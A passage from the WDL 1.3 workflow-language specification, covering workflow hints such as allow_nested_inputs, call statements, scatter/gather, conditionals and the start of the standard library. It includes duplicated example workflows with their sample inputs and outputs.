main.foobar_results | Int result from call to foobar | Anywhere in main's output section and by the caller of main |
main.echo_array | Array of String contents of File results from calls to echo in the scatter | Anywhere in main's output section and by the caller of main |
* Task inputs are accessible to be set by the caller of main if the workflow is called with allow_nested_inputs: true in its hints section.
Workflow Inputs
The workflow and task input sections have identical semantics.
Workflow Outputs
The workflow and task output sections have identical semantics.
By default, if the output {...} section is omitted from a top-level workflow, then the workflow has no outputs. However, the execution engine may choose allow the user to specify that when the top-level output section is omitted, all outputs from all calls (including nested calls) should be returned.
If the output {...} section is omitted from a workflow that is called as a subworkflow, then that call must not have outputs. Formally defined outputs of subworkflows are required for the following reasons:
- To present the same interface when calling subworkflows as when calling tasks.
- To make it easy for callers of subworkflows to find out exactly what outputs the call is creating.
- In the case of nested subworkflows, to give the outputs at the top level a simple fixed name rather than a long qualified name like
a.b.c.d.out(which is liable to change if the underlying implementation ofcchanges, for example).
Workflow Hints
The hints section is optional and may contain any number of attributes (key/value pairs) that provide hints to the execution engine. Some workflow hint keys are reserved and have well-defined values.
The execution engine may ignore any unsupported hint. A workflow execution never fails due to the inability of the execution engine to recognize or satisfy a hint.
Unlike task hints, workflow hints must have literal values; expressions are not allowed.
Reserved Workflow Hints
The following hints are reserved. An implementation is not required to support these attributes, but if it does support a reserved attribute it must enforce the semantics and allowed values defined below. The purpose of reserving these hints is to encourage interoperability of tasks and workflows between different execution engines.
allow_nested_inputs
- Allowed type:
Boolean - Alias:
allowNestedInputs
When running a workflow, the user typically is only allowed to specify values for the inputs defined in the top-level workflow's input section. However, setting the allow_nested_inputs hint to true specifies that the execution engine is allowed to let the user set the value of some call inputs at runtime.
A call input value is eligible to be set at runtime if it corresponds to a subworkflow or task input that has a default value and its value is not set explicitly in the call's input section. The default value is used for an eligible call input when allow_nested_inputs is set to false, when the user does not specify a value for the input at runtime, or when the execution engine does not suppport allow_nested_inputs.
The execution engine may refuse to execute a workflow when allow_nested_inputs is set to false and the user attempts to specify a value for a nested input, but if it does execute the workflow and ignore the user-specified value then it should show a warning.
Example: test_allow_nested_inputs.wdl
version 1.3
task nested {
input {
String greeting
String name = "Joe"
}
command <<<
echo "~{greeting} ~{name}"
>>>
output {
String greeting_out = read_string(stdout())
}
}
workflow test_allow_nested_inputs {
call nested {
greeting = "Hello"
}
output {
String nested_greeting = nested.greeting_out
}
hints {
allow_nested_inputs: true
}
}
version 1.3
task nested {
input {
String greeting
String name = "Joe"
}
command <<<
echo "~{greeting} ~{name}"
>>>
output {
String greeting_out = read_string(stdout())
}
}
workflow test_allow_nested_inputs {
call nested {
greeting = "Hello"
}
output {
String nested_greeting = nested.greeting_out
}
hints {
allow_nested_inputs: true
}
}
Example input:
{
"test_allow_nested_inputs.nested.name": "John"
}
Example output:
{
"test_allow_nested_inputs.nested_greeting": "Hello John"
}
Test config:
{
"capabilities": ["allow_nested_inputs"]
}
Setting allow_nested_inputs to false in a workflow has the effect of also setting it to false in any nested subworkflows called by that workflow. In the following example, allow_nested_inputs is set to false in the top-level workflow (multi_nested_inputs), which overrides the value of true in the subworkflow (test_allow_nested_inputs).
Example: multi_nested_inputs.wdl
version 1.3
import "test_allow_nested_inputs.wdl" as nested
workflow multi_nested_inputs {
call nested.test_allow_nested_inputs
hints {
allow_nested_inputs: false
}
output {
String nested_greeting = test_allow_nested_inputs.nested_greeting
}
}
version 1.3
import "test_allow_nested_inputs.wdl" as nested
workflow multi_nested_inputs {
call nested.test_allow_nested_inputs
hints {
allow_nested_inputs: false
}
output {
String nested_greeting = test_allow_nested_inputs.nested_greeting
}
}
Example input:
{
"multi_nested_inputs.test_allow_nested_inputs.nested.name": "John"
}
Test config:
{
"capabilities": ["allow_nested_inputs"],
"fail": true
}
Call Statement
A workflow calls other tasks/workflows via the call keyword. A call is followed by the name of the task or subworkflow to run. If a task is defined in the same WDL document as the calling workflow, it may be called using just the task name. A task or workflow in an imported WDL must be called using its fully-qualified name.
Each call must be uniquely identifiable. By default, the call's unique identifier is the task or subworkflow name (e.g., call foo would be referenced by name foo). However, to call foo multiple times in the same workflow, it is necessary to give all except one of the call statements a unique alias using the as clause, e.g., call foo as bar.
A call has an optional body in braces ({}), which may contain a comma-delimited list of inputs to the call. A call must, at a minimum, provide values for all of the task/subworkflow's required inputs, and each input value/expression must match the type of the task/subworkflow's corresponding input parameter. An input value may be any valid expression, not just a reference to another call output. If a task has no required parameters, then the call body may be empty or omitted.
If a call input has the same name as a declaration from the current scope, the name of the input may appear alone (without an expression) to implicitly bind the value of that declaration. For example, if a workflow and task both have inputs x and z of the same types, then call mytask {x, y=b, z} is equivalent to call mytask {x=x, y=b, z=z}.
Example: call_example.wdl
version 1.3
import "other.wdl" as lib
task repeat {
input {
Int i = 0 # this will cause the task to fail if not overriden by the caller
String? opt_string
}
command <<<
if [ "~{i}" -lt "1" ]; then
echo "i must be >= 1"
exit 1
fi
for i in {1..~{i}}; do
printf '~{select_first([opt_string, "default"])}\n'
done
>>>
output {
Array[String] lines = read_lines(stdout())
}
}
workflow call_example {
input {
String s
Int i
}
# Calls repeat with one required input - it is okay to not
# specify a value for repeat.opt_string since it is optional.
call repeat { i = 3 }
# Calls repeat a second time, this time with both inputs.
# We need to give this one an alias to avoid name-collision.
call repeat as repeat2 {
i = i * 2,
opt_string = s
}
# Calls repeat with one required input using the abbreviated
# syntax for `i`.
call repeat as repeat3 { i, opt_string = s }
# Calls a workflow imported from lib with no inputs.
call lib.other
# This call is also valid
call lib.other as other_workflow2 {}
output {
Array[String] lines1 = repeat.lines
Array[String] lines2 = repeat2.lines
Array[String] lines3 = repeat3.lines
Int? results1 = other.results
Int? results2 = other_workflow2.results
}
}
version 1.3
import "other.wdl" as lib
task repeat {
input {
Int i = 0 # this will cause the task to fail if not overriden by the caller
String? opt_string
}
command <<<
if [ "~{i}" -lt "1" ]; then
echo "i must be >= 1"
exit 1
fi
for i in {1..~{i}}; do
printf '~{select_first([opt_string, "default"])}\n'
done
>>>
output {
Array[String] lines = read_lines(stdout())
}
}
workflow call_example {
input {
String s
Int i
}
# Calls repeat with one required input - it is okay to not
# specify a value for repeat.opt_string since it is optional.
call repeat { i = 3 }
# Calls repeat a second time, this time with both inputs.
# We need to give this one an alias to avoid name-collision.
call repeat as repeat2 {
i = i * 2,
opt_string = s
}
# Calls repeat with one required input using the abbreviated
# syntax for `i`.
call repeat as repeat3 { i, opt_string = s }
# Calls a workflow imported from lib with no inputs.
call lib.other
# This call is also valid
call lib.other as other_workflow2 {}
output {
Array[String] lines1 = repeat.lines
Array[String] lines2 = repeat2.lines
Array[String] lines3 = repeat3.lines
Int? results1 = other.results
Int? results2 = other_workflow2.results
}
}
Example input:
{
"call_example.s": "hello",
"call_example.i": 2
}
Example output:
{
"call_example.lines1": ["default", "default", "default"],
"call_example.lines2": ["hello", "hello", "hello", "hello"],
"call_example.lines3": ["hello", "hello"],
"call_example.results1": null,
"call_example.results2": null
}
For historical reasons, the keyword input: may optionally precede the list of inputs inside the braces. In the following example, all the call statements are equivalent.
Example: test_input_keyword.wdl
version 1.3
import "call_example.wdl" as lib
workflow test_input_keyword {
input {
Int i
}
# These three calls are equivalent
call lib.repeat as rep1 { i }
call lib.repeat as rep2 { i = i}
call lib.repeat as rep3 {
input: # optional (for backward compatibility)
i
}
call lib.repeat as rep4 {
input: # optional (for backward compatibility)
i = i
}
output {
Array[String] lines1 = rep1.lines
Array[String] lines2 = rep2.lines
Array[String] lines3 = rep3.lines
Array[String] lines4 = rep4.lines
}
}
version 1.3
import "call_example.wdl" as lib
workflow test_input_keyword {
input {
Int i
}
# These three calls are equivalent
call lib.repeat as rep1 { i }
call lib.repeat as rep2 { i = i}
call lib.repeat as rep3 {
input: # optional (for backward compatibility)
i
}
call lib.repeat as rep4 {
input: # optional (for backward compatibility)
i = i
}
output {
Array[String] lines1 = rep1.lines
Array[String] lines2 = rep2.lines
Array[String] lines3 = rep3.lines
Array[String] lines4 = rep4.lines
}
}
Example input:
{
"test_input_keyword.i": 2
}
Example output:
{
"test_input_keyword.lines1": ["default", "default"],
"test_input_keyword.lines2": ["default", "default"],
"test_input_keyword.lines3": ["default", "default"],
"test_input_keyword.lines4": ["default", "default"]
}
The execution engine may execute a call as soon as all its inputs are available. If call x's inputs are based on call y's outputs (i.e., x depends on y), x can be run as soon as - but not before - y has completed.
An after clause can be used to create an explicit dependency between x and y (i.e., one that isn't based on the availability of y's outputs). For example, call x after y after z. An explicit dependency is only required if x must not execute until after y and x doesn't already depend on output from y.
Example: test_after.wdl
version 1.3
import "call_example.wdl" as lib
workflow test_after {
# Call repeat
call lib.repeat { i = 2, opt_string = "hello" }
# Call `repeat` again with the output from the first call.
# This call will wait until `repeat` is finished.
call lib.repeat as repeat2 {
i = 1,
opt_string = sep(" ", repeat.lines)
}
# Call `repeat` again. This call does not depend on the output
# from an earlier call, but we specify explicitly that this
# task must wait until `repeat` is complete before executing.
call lib.repeat as repeat3 after repeat { i = 3 }
output {
Array[String] lines1 = repeat.lines
Array[String] lines2 = repeat2.lines
Array[String] lines3 = repeat3.lines
}
}
version 1.3
import "call_example.wdl" as lib
workflow test_after {
# Call repeat
call lib.repeat { i = 2, opt_string = "hello" }
# Call `repeat` again with the output from the first call.
# This call will wait until `repeat` is finished.
call lib.repeat as repeat2 {
i = 1,
opt_string = sep(" ", repeat.lines)
}
# Call `repeat` again. This call does not depend on the output
# from an earlier call, but we specify explicitly that this
# task must wait until `repeat` is complete before executing.
call lib.repeat as repeat3 after repeat { i = 3 }
output {
Array[String] lines1 = repeat.lines
Array[String] lines2 = repeat2.lines
Array[String] lines3 = repeat3.lines
}
}
Example input:
{}
Example output:
{
"test_after.lines1": ["hello", "hello"],
"test_after.lines2": ["hello hello"],
"test_after.lines3": ["default", "default", "default"]
}
A call's outputs are available to be used as inputs to other calls in the workflow or as workflow outputs immediately after the execution of the call has completed. The only task declarations that are accessible outside of the task are its output declarations; call inputs and private declarations cannot be referenced by the calling workflow. To expose a call input, add an output to the task that simply copies the input. Note that the output must use a different name since every declaration in a task or workflow must have a unique name.
Example: copy_input.wdl
version 1.3
task greet {
input {
String greeting
}
command <<< printf "~{greeting}, nice to meet you!" >>>
output {
# expose the input to s as an output
String greeting_out = greeting
String msg = read_string(stdout())
}
}
workflow copy_input {
input {
String name
}
call greet { greeting = "Hello ~{name}" }
output {
String greeting = greet.greeting_out
String msg = greet.msg
}
}
version 1.3
task greet {
input {
String greeting
}
command <<< printf "~{greeting}, nice to meet you!" >>>
output {
# expose the input to s as an output
String greeting_out = greeting
String msg = read_string(stdout())
}
}
workflow copy_input {
input {
String name
}
call greet { greeting = "Hello ~{name}" }
output {
String greeting = greet.greeting_out
String msg = greet.msg
}
}
Example input:
{
"copy_input.name": "Billy"
}
Example output:
{
"copy_input.greeting": "Hello Billy",
"copy_input.msg": "Hello Billy, nice to meet you!"
}
Computing Call Inputs
Any required workflow inputs (i.e., those that are not initialized with a default expression) must have their values provided when invoking the workflow. Inputs may be specified for a workflow invocation using any mechanism supported by the execution engine, including the standard JSON format.
A call to a subworkflow or task must, at a minimum, provide a value for each required input. The call may also specify values for any optional inputs. Any optional inputs that are not specified in the call may be set by the user at runtime if the execution engine supports the allow_nested_inputs hint and it is set to true in the workflow's hints section.
The following table describes whether a subworkflow or task input's value must be specified in the call inputs and whether it may be set at runtime based on whether it has a default value and the value of the allow_nested_inputs hint:
| Has default value? | Value of allow_nested_inputs | Must be specified in call inputs? | Can be overriden at runtime? |
|---|---|---|---|
| No | false | Yes | No |
| No | true | Yes | No |
| Yes | false | No | No |
| Yes | true | No | Yes |
๐ Previously, setting allow_nested_inputs to true also allowed for required task inputs to be left unsatisfied by the calling workflow and only specified at runtime. This behavior is deprecated and will be removed in WDL 2.0.
๐ The ability to set allowNestedInputs in the workflow's meta section is deprecated and will be removed in WDL 2.0.
Example: allow_nested.wdl
version 1.3
import "call_example.wdl" as lib
task inc {
input {
Int y
File ref_file # Do nothing with this
}
command <<<
printf ~{y + 1}
>>>
output {
Int incr = read_int(stdout())
}
requirements {
container: "ubuntu:latest"
}
}
workflow allow_nested {
input {
Int int_val
String msg1
Array[Int] my_ints
File ref_file
}
hints {
allow_nested_inputs: true
}
call lib.repeat {
i = int_val,
opt_string = msg1
}
call lib.repeat as repeat2 {
i = 2
}
scatter (i in my_ints) {
call inc {
y=i, ref_file=ref_file
}
}
output {
Array[String] lines1 = repeat.lines
Array[String] lines2 = repeat2.lines
Array[Int] incrs = inc.incr
}
}
version 1.3
import "call_example.wdl" as lib
task inc {
input {
Int y
File ref_file # Do nothing with this
}
command <<<
printf ~{y + 1}
>>>
output {
Int incr = read_int(stdout())
}
requirements {
container: "ubuntu:latest"
}
}
workflow allow_nested {
input {
Int int_val
String msg1
Array[Int] my_ints
File ref_file
}
hints {
allow_nested_inputs: true
}
call lib.repeat {
i = int_val,
opt_string = msg1
}
call lib.repeat as repeat2 {
i = 2
}
scatter (i in my_ints) {
call inc {
y=i, ref_file=ref_file
}
}
output {
Array[String] lines1 = repeat.lines
Array[String] lines2 = repeat2.lines
Array[Int] incrs = inc.incr
}
}
Example input:
{
"allow_nested.int_val": 3,
"allow_nested.msg1": "hello",
"allow_nested.my_ints": [1, 2, 3],
"allow_nested.ref_file": "data/hello.txt",
"allow_nested.repeat2.opt_string": "goodbye"
}
Example output:
{
"allow_nested.lines1": ["hello", "hello", "hello"],
"allow_nested.lines2": ["goodbye", "goodbye"],
"allow_nested.incrs": [2, 3, 4]
}
In the preceding example, the workflow calling repeat2 does not provide a value for the optional input i. Normally this would cause the task to fail, since i must have a value >= 1 and its default value is 0. However, if the execution engine supports allow_nested_inputs, then specifying allow_nested_inputs: true in the workflow's hints section means that repeat2.i may be set by the caller of the workflow, e.g., by including "allow_nested.repeat2.i": 2, in the input JSON.
It is not allowed to override a call input at runtime, even if nested inputs are allowed. For example, if the user tried to specify "allow_nested.repeat.opt_string": "hola" in the input JSON, an error would be raised because the workflow already specifies a value for that input.
The allow_nested_inputs directive only applies to user-supplied inputs. There is no mechanism for the workflow itself to set a value for a nested input when calling a subworkflow. For example, the following workflow is invalid:
Example: call_subworkflow_fail.wdl
version 1.3
import "copy_input.wdl" as copy
workflow call_subworkflow {
meta {
allow_nested_inputs: true
}
# error! A workflow can't specify a nested input for a subworkflow's call.
call copy.copy_input { greet.greeting = "hola" }
}
version 1.3
import "copy_input.wdl" as copy
workflow call_subworkflow {
meta {
allow_nested_inputs: true
}
# error! A workflow can't specify a nested input for a subworkflow's call.
call copy.copy_input { greet.greeting = "hola" }
}
Example input:
{}
Example output:
{}
Test config:
{
"fail": true
}
Scatter Statement
Scatter/gather is a common parallelization pattern in computer science. Given a collection of inputs (such as an array), the "scatter" step executes a set of operations on each input in parallel. In the "gather" step, the outputs of all the individual scatter-tasks are collected into the final output.
WDL provides a mechanism for scatter/gather using the scatter statement. A scatter statement begins with the scatter keyword and has three essential pieces:
- An expression that evaluates to an
Array[X]- the array to be scattered over. - The scatter variable - an identifier that will hold the input value in each iteration of the scatter. The scatter variable is always of type
X, whereXis the item type of theArray. The scatter variable may only be referenced in the body of the scatter. - A body that contains any number of nested statements - declarations, calls, scatters, conditionals - that are executed for each value in the collection.
After evaluation has completed for all iterations of a scatter, each declaration or call output in the scatter body (except for the scatter variable) is collected into an array, and those array declarations are exposed in the enclosing context. In other words, for a declaration or call output T <name> within a scatter body, a declaration Array[T] <name> is implicitly available outside of the scatter body. The ordering of an exported array is guaranteed to match the ordering of the input array. In the example below, String greeting is accessible anywhere in the scatter body, and Array[String] greeting is a collection of all the values of greeting - in the same order as name_array - that is accessible outside of the scatter anywhere in workflow test_scatter.
Example: test_scatter.wdl
version 1.3
task say_hello {
input {
String greeting
}
command <<<
printf "~{greeting}, how are you?"
>>>
output {
String msg = read_string(stdout())
}
}
workflow test_scatter {
input {
Array[String] name_array = ["Joe", "Bob", "Fred"]
String salutation = "Hello"
}
# `name_array` is an identifier expression that evaluates to an Array
# of Strings.
# `name` is a `String` declaration that is assigned a different value
# - one of the elements of `name_array` - during each iteration.
scatter (name in name_array) {
# these statements are evaluated for each different value of `name`,s
String greeting = "~{salutation} ~{name}"
call say_hello { greeting = greeting }
}
output {
Array[String] messages = say_hello.msg
}
}
version 1.3
task say_hello {
input {
String greeting
}
command <<<
printf "~{greeting}, how are you?"
>>>
output {
String msg = read_string(stdout())
}
}
workflow test_scatter {
input {
Array[String] name_array = ["Joe", "Bob", "Fred"]
String salutation = "Hello"
}
# `name_array` is an identifier expression that evaluates to an Array
# of Strings.
# `name` is a `String` declaration that is assigned a different value
# - one of the elements of `name_array` - during each iteration.
scatter (name in name_array) {
# these statements are evaluated for each different value of `name`,s
String greeting = "~{salutation} ~{name}"
call say_hello { greeting = greeting }
}
output {
Array[String] messages = say_hello.msg
}
}
Example input:
{}
Example output:
{
"test_scatter.messages": [
"Hello Joe, how are you?",
"Hello Bob, how are you?",
"Hello Fred, how are you?"
]
}
In this example, the scatter body is evaluated three times - once for each value in name_array. On a multi-core computer, these evaluations might happen in parallel, with each evaluation running in a separate thread or subprocess; on a cloud platform, each of these evaluations might take place in a different virtual machine.
The scatter body is a nested scope in which the scatter variable is accessible, along with all of the declarations and call outputs that are accessible in the enclosing scope. The scatter variable is not accessible outside the scatter body. In the preceding example, it would be an error to reference name in the workflow's output section. However, if the scatter contained a nested scatter, name would be accessible in that nested scatter's body. Similarly, calls within the scatter body are able to depend on each other and reference each others' outputs.
If scatters are nested to multiple levels, the output types are also nested to the same number of levels.
Example: nested_scatter.wdl
version 1.3
import "test_scatter.wdl" as scat
task make_name {
input {
String first
String last
}
command <<<
printf "~{first} ~{last}"
>>>
output {
String name = read_string(stdout())
}
}
workflow nested_scatter {
input {
Array[String] first_names = ["Bilbo", "Gandalf", "Merry"]
Array[String] last_names = ["Baggins", "the Grey", "Brandybuck"]
Array[String] salutations = ["Hello", "Goodbye"]
}
Array[String] honorifics = ["Mr.", "Wizard"]
# the zip() function creates an array of pairs
Array[Pair[String, String]] name_pairs = zip(first_names, last_names)
# the range() function creates an array of increasing integers
Array[Int] counter = range(length(name_pairs))
scatter (name_and_index in zip(name_pairs, counter) ) {
Pair[String, String] names = name_and_index.left
# Use a different honorific for even and odd items in the array
# `honorifics` is accessible here
String honorific = honorifics[name_and_index.right % 2]
call make_name {
first = names.left,
last = names.right
}
scatter (salutation in salutations) {
# `names`, and `salutation` are all accessible here
String short_greeting = "~{salutation} ~{honorific} ~{names.left}"
call scat.say_hello { greeting = short_greeting }
# the output of `make_name` is also accessible
String long_greeting = "~{salutation} ~{honorific} ~{make_name.name}"
call scat.say_hello as say_hello_long { greeting = long_greeting }
# within the scatter body, when we access the output of the
# say_hello call, we get a String
Array[String] messages = [say_hello.msg, say_hello_long.msg]
}
# this would be an error - `salutation` is not accessible here
# String scatter_saluation = salutation
}
# Outside of the scatter body, we can access all of the names that
# are inside the scatter body, but the types are now all Arrays.
# Each of these outputs will be an array of length 3 (the same
# length as `name_and_index`).
output {
# Here we are one level of nesting away from `honorific`, so
# the implicitly created array is one level deep
Array[String] used_honorifics = honorific
# Here we are two levels of nesting away from `messages`, so
# the array is two levels deep
Array[Array[Array[String]]] out_messages = messages
# This would be an error - 'names' is not accessible here
# String scatter_names = names
}
}
version 1.3
import "test_scatter.wdl" as scat
task make_name {
input {
String first
String last
}
command <<<
printf "~{first} ~{last}"
>>>
output {
String name = read_string(stdout())
}
}
workflow nested_scatter {
input {
Array[String] first_names = ["Bilbo", "Gandalf", "Merry"]
Array[String] last_names = ["Baggins", "the Grey", "Brandybuck"]
Array[String] salutations = ["Hello", "Goodbye"]
}
Array[String] honorifics = ["Mr.", "Wizard"]
# the zip() function creates an array of pairs
Array[Pair[String, String]] name_pairs = zip(first_names, last_names)
# the range() function creates an array of increasing integers
Array[Int] counter = range(length(name_pairs))
scatter (name_and_index in zip(name_pairs, counter) ) {
Pair[String, String] names = name_and_index.left
# Use a different honorific for even and odd items in the array
# `honorifics` is accessible here
String honorific = honorifics[name_and_index.right % 2]
call make_name {
first = names.left,
last = names.right
}
scatter (salutation in salutations) {
# `names`, and `salutation` are all accessible here
String short_greeting = "~{salutation} ~{honorific} ~{names.left}"
call scat.say_hello { greeting = short_greeting }
# the output of `make_name` is also accessible
String long_greeting = "~{salutation} ~{honorific} ~{make_name.name}"
call scat.say_hello as say_hello_long { greeting = long_greeting }
# within the scatter body, when we access the output of the
# say_hello call, we get a String
Array[String] messages = [say_hello.msg, say_hello_long.msg]
}
# this would be an error - `salutation` is not accessible here
# String scatter_saluation = salutation
}
# Outside of the scatter body, we can access all of the names that
# are inside the scatter body, but the types are now all Arrays.
# Each of these outputs will be an array of length 3 (the same
# length as `name_and_index`).
output {
# Here we are one level of nesting away from `honorific`, so
# the implicitly created array is one level deep
Array[String] used_honorifics = honorific
# Here we are two levels of nesting away from `messages`, so
# the array is two levels deep
Array[Array[Array[String]]] out_messages = messages
# This would be an error - 'names' is not accessible here
# String scatter_names = names
}
}
Example input:
{}
Example output:
{
"nested_scatter.out_messages": [
[
["Hello Mr. Bilbo, how are you?", "Hello Mr. Bilbo Baggins, how are you?"],
["Goodbye Mr. Bilbo, how are you?", "Goodbye Mr. Bilbo Baggins, how are you?"]
],
[
["Hello Wizard Gandalf, how are you?", "Hello Wizard Gandalf the Grey, how are you?"],
["Goodbye Wizard Gandalf, how are you?", "Goodbye Wizard Gandalf the Grey, how are you?"]
],
[
["Hello Mr. Merry, how are you?", "Hello Mr. Merry Brandybuck, how are you?"],
["Goodbye Mr. Merry, how are you?", "Goodbye Mr. Merry Brandybuck, how are you?"]
]
],
"nested_scatter.used_honorifics": ["Mr.", "Wizard", "Mr."]
}
Conditional Statement
A conditional statement consists of one or more conditional clauses, each having an associated body. The types of conditional statement clauses are:
- A required
ifclause with an associated expression that evaluates to aBoolean. Theifclause must be first in the conditional expression. - Zero or more
else ifclauses, each with an associated expression that evaluates to aBoolean. If present,else ifclauses must follow theifclause and be before the optionalelseclause. - At most, one
elseclause with no associated expression. Theelseclause must be last in the conditional expression.
When a conditional statement is evaluated, each conditional clause is evaluated sequentially; for each if and else if clause, the expression is evaluatedโif the result of the evaluation is true, the body of that clause is evaluated and the entire conditional statement suspends further evaluation. If none of the if or else if clauses execute and we reach the final else clause, the else clause is executed and the conditional suspends further evaluation.
The declarations and call outputs promoted to the parent scope depend on a union of the scopes for each conditional statement clause:
- Declarations and call outputs that are made available under every condition, including the exhaustive
elseclause, are promoted to the parent scope as their declared type. - Declarations and call outputs that are missing from one or more clauses, are declared as optional in one or more clauses, or are missing from the exhaustive
elseclause are promoted to the parent scope as optional versions of their declared type.
Simply put, types that are guaranteed to be evaluated in all cases are promoted as themselves whereas types that may not be evaluated (or are declared as optional in one of the clauses) are promoted as the optional equivalent of themselves. The result is a set of declarations and call outputs available in the parent scope that concretely represent the union of all scopes of the conditional statement. Any declaration in the union map that does not evaluate in a conditional statement clause's body is set to None. Further, when finding common types across scopes, the type declared in the earliest conditional statement clause is used as the base type. If a declaration that would be promoted to a parent scope conflicts with an existing name in the parent scope, an error should be returned.
The following algorithm is one correct way to implement the functionality described above. It is provided to illustrate the concept, but implementations that achieve the correct result using a different algorithm are still correct.
- Create a new map of declaration names to types. Traverse all clauses in the conditional statement, gathering the declarations in the scope into a mapping of declaration names to types. For each clause:
- Reconcile the declaration names and their associated types in the map.
- If the name isn't already in the map, insert the name into the map and assign the type seen.
- If the name is already in the map, update the mapped type to a common type between the current declaration's type and the type stored in the map. If there is no common type, emit an error.
- Perform a second pass through each clause in the conditional statement. For each name in the map created in step 1, if that name is not seen in the current clause's scope, mark that type as optional.
- If there is no
elseclause, mark every type in the map as optional.
Consider this illustrative example.
if (...) {
String a = "foo"
String b = "foo"
String always_available = "foo"
String bad = "foo"
call sayHello {}
} else if (...) {
# If this clause executes, both `a` and `b` will be `None`.
String? b = None
String c = "bar"
String always_available = "bar"
Int bad = 1
call sayHello {}
} else {
String a = "baz"
String b = "baz"
String c = "baz"
String always_available = "baz"
String bad = "baz"
call sayHello {}
}
# Both `a` and `b` can be `None` or unevaluated, so they both promote as a `String?`.
# `c` is missing from the first scope, so it must also be marked as `String?`.
# `always_available` is always available, so it will be promoted as a `String`.
# `bad` will return an error, as there is no common type between a `String` and an `Int`.
# `sayHello` is run in every clause, so its outputs will be available in the parent scope as non-optionals.
Scoping Rules
The scoping rules for conditionals are similar to those for scattersโdeclarations or call outputs inside a conditional body are accessible within that conditional and any nested statements.
In the example below, Int j is accessible anywhere in the conditional body, and Int? j is an optional that is accessible outside of the conditional anywhere in workflow test_conditional.
Example: test_conditional.wdl
version 1.3
task gt_three {
input {
Int i
}
command <<< >>>
output {
Boolean valid = i > 3
}
}
workflow test_conditional {
input {
Boolean do_scatter = true
Array[Int] scatter_range = [1, 2, 3, 4, 5]
}
if (do_scatter) {
Int j = 2
scatter (i in scatter_range) {
call gt_three { i = i + j }
if (gt_three.valid) {
Int result = i * j
}
# `result` is accessible here as an optional
Int result2 = if defined(result) then select_first([result]) else 0
}
}
# Here there is an implicit `Array[Int?]? result` declaration, since
# `result` is inside a conditional inside a scatter inside a conditional.
# We can "unwrap" the other optional using select_first.
Array[Int?] maybe_results = select_first([result, []])
output {
Int? j_out = j
# We can unwrap the inner optional using select_all to get rid of all
# the `None` values in the array.
Array[Int] result_array = select_all(maybe_results)
# Here we reference the implicit declaration of result2, which is
# created from an `Int` declaration inside a scatter inside a
# conditional, and so becomes an optional array.
Array[Int]? maybe_result2 = result2
}
}
version 1.3
task gt_three {
input {
Int i
}
command <<< >>>
output {
Boolean valid = i > 3
}
}
workflow test_conditional {
input {
Boolean do_scatter = true
Array[Int] scatter_range = [1, 2, 3, 4, 5]
}
if (do_scatter) {
Int j = 2
scatter (i in scatter_range) {
call gt_three { i = i + j }
if (gt_three.valid) {
Int result = i * j
}
# `result` is accessible here as an optional
Int result2 = if defined(result) then select_first([result]) else 0
}
}
# Here there is an implicit `Array[Int?]? result` declaration, since
# `result` is inside a conditional inside a scatter inside a conditional.
# We can "unwrap" the other optional using select_first.
Array[Int?] maybe_results = select_first([result, []])
output {
Int? j_out = j
# We can unwrap the inner optional using select_all to get rid of all
# the `None` values in the array.
Array[Int] result_array = select_all(maybe_results)
# Here we reference the implicit declaration of result2, which is
# created from an `Int` declaration inside a scatter inside a
# conditional, and so becomes an optional array.
Array[Int]? maybe_result2 = result2
}
}
Example input:
{}
Example output:
{
"test_conditional.j_out": 2,
"test_conditional.result_array": [4, 6, 8, 10],
"test_conditional.maybe_result2": [0, 4, 6, 8, 10],
"test_conditional.j_out": 2
}
Example: if_else.wdl
version 1.3
task greet {
input {
String time
}
command <<<
printf "Good ~{time} buddy!"
>>>
output {
String greeting = read_string(stdout())
}
}
workflow if_else {
input {
Boolean is_morning = false
}
if (is_morning) {
call greet { input: time = "morning" }
} else {
call greet { input: time = "afternoon" }
}
output {
String greeting = greet.greeting
}
}
version 1.3
task greet {
input {
String time
}
command <<<
printf "Good ~{time} buddy!"
>>>
output {
String greeting = read_string(stdout())
}
}
workflow if_else {
input {
Boolean is_morning = false
}
if (is_morning) {
call greet { input: time = "morning" }
} else {
call greet { input: time = "afternoon" }
}
output {
String greeting = greet.greeting
}
}
Example input:
{}
Example output:
{
"if_else.greeting": "Good afternoon buddy!"
}
It is impossible to have a multi-level optional type, e.g., Int??. The outputs of a conditional are only ever single-level optionals, even when there are nested conditionals.
Example: nested_if.wdl
version 1.3
import "if_else.wdl"
workflow nested_if {
input {
Boolean morning
Boolean friendly
}
if (morning) {
if (friendly) {
call if_else.greet { input: time = "morning" }
}
}
output {
# Even though it's within a nested conditional, greeting
# has a type of `String?` rather than `String??`
String? greeting_maybe = greet.greeting
# Similarly, `select_first` produces a `String`, not a `String?`
String greeting = select_first([greet.greeting, "hi"])
}
}
version 1.3
import "if_else.wdl"
workflow nested_if {
input {
Boolean morning
Boolean friendly
}
if (morning) {
if (friendly) {
call if_else.greet { input: time = "morning" }
}
}
output {
# Even though it's within a nested conditional, greeting
# has a type of `String?` rather than `String??`
String? greeting_maybe = greet.greeting
# Similarly, `select_first` produces a `String`, not a `String?`
String greeting = select_first([greet.greeting, "hi"])
}
}
Example input:
{
"nested_if.morning": true,
"nested_if.friendly": false
}
Example output:
{
"nested_if.greeting_maybe": null,
"nested_if.greeting": "hi"
}
Standard Library
The following functions are available to be called in WDL expressions. The signature of each function is given as R func_name(T1, T2, ...), where R is the return type and T1, T2, ... are the parameter types. All function parameters must be specified in order, and all function parameters are required, with the exception that the last parameter(s) of some functions is optional (denoted by the type in brackets []).
A function is called using the following syntax: R' val = func_name(arg1, arg2, ...), where R' is a type that is coercible from R, and arg1, arg2, ... are expressions whose types are coercible to T1, T2, ...
A function may be generic, which means that one or more of its parameters and/or its return type are generic. These functions are defined using letters (e.g. X, Y) for the type parameters, and the bounds of each type parameter is specified in the function description.
A function may be polymorphic, which means it is actually multiple functions ("choices") with the same name but different signatures. Such a function may be defined using | to denote the set of alternative valid types for one or more of its parameters, or it may have each choice defined separately.
Functions are grouped by their argument types and restrictions. Some functions may be restricted as to where they may be used. An unrestricted function may be used in any expression.
Functions that are new in this version of the specification are denoted by โจ, and deprecated functions are denoted by ๐.
Numeric Functions
These functions all operate on numeric types.
Restrictions: None
floor
Int floor(Float)
Rounds a floating point number down to the next lower integer.
Parameters:
Float: the number to round.
Returns: An integer.
Example: test_floor.wdl
version 1.3
workflow test_floor {
input {
Int i1
}
Int i2 = i1 - 1
Float f1 = i1
Float f2 = i1 - 0.1
output {
Array[Boolean] all_true = [floor(f1) == i1, floor(f2) == i2]
}
}
version 1.3
workflow test_floor {
input {
Int i1
}
Int i2 = i1 - 1
Float f1 = i1
Float f2 = i1 - 0.1
output {
